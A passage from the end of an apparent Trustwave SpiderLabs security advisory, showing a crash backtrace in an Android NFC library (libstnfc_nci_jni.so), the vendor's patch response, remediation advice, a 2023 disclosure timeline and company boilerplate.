10-05 17:19:36.935 24534 24534 F DEBUG : x16 00000074edaf3d48 x17 0000007608bcfe80 x18 00000074dd3ba000 x19 00000074e4493c31
10-05 17:19:36.935 24534 24534 F DEBUG : x20 00000000fffffff8 x21 0000000000000000 x22 0000000000000000 x23 00000074edaf6b0c
10-05 17:19:36.935 24534 24534 F DEBUG : x24 0000000000000000 x25 00000074edaf6c11 x26 00000074edaf7f74 x27 00000074edaf6378
10-05 17:19:36.935 24534 24534 F DEBUG : x28 00000074edaf7f70 x29 00000074e4493d90
10-05 17:19:36.935 24534 24534 F DEBUG : lr 00000074edaaee70 sp 00000074e4493c10 pc 00000074edaae028 pst 0000000060001000
10-05 17:19:36.935 24534 24534 F DEBUG : backtrace:
10-05 17:19:36.935 24534 24534 F DEBUG :     #00 pc 000000000002d028 /system/system_ext/lib64/libstnfc_nci_jni.so (NfcStExtensions::setRfConfiguration(int, unsigned char*)+592) (BuildId: a48e883d65c1a11933117a7a98a39720)
10-05 17:19:36.935 24534 24534 F DEBUG :     #01 pc 00000000000235fc /system/system_ext/lib64/libstnfc_nci_jni.so (android::nativeNfcStExtensions_setRfConfiguration(_JNIEnv*, _jobject*, int, _jbyteArray*)+364) (BuildId: a48e883d65c1a11933117a7a98a39720)
10-05 17:19:36.935 24534 24534 F DEBUG :     #02 pc 0000000000017754 /data/dalvik-cache/arm64/system@system_ext@app@Nfc_st@Nfc_st.apk@classes.dex (art_jni_trampoline+132)

*****
Vendor Response:
Patched in GitHub

Remediation Steps:
Make sure you have the most up-to-date security patches installed for your Android device.

Revision History:
03/03/2023 - Vulnerability disclosed
04/12/2023 - Confirmed by vendor
05/02/2023 - 09/20/2023 - Patches for Findings 1-7 worked on
09/26/2023 - Final patch released by vendor
12/22/2023 - Advisory published

About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.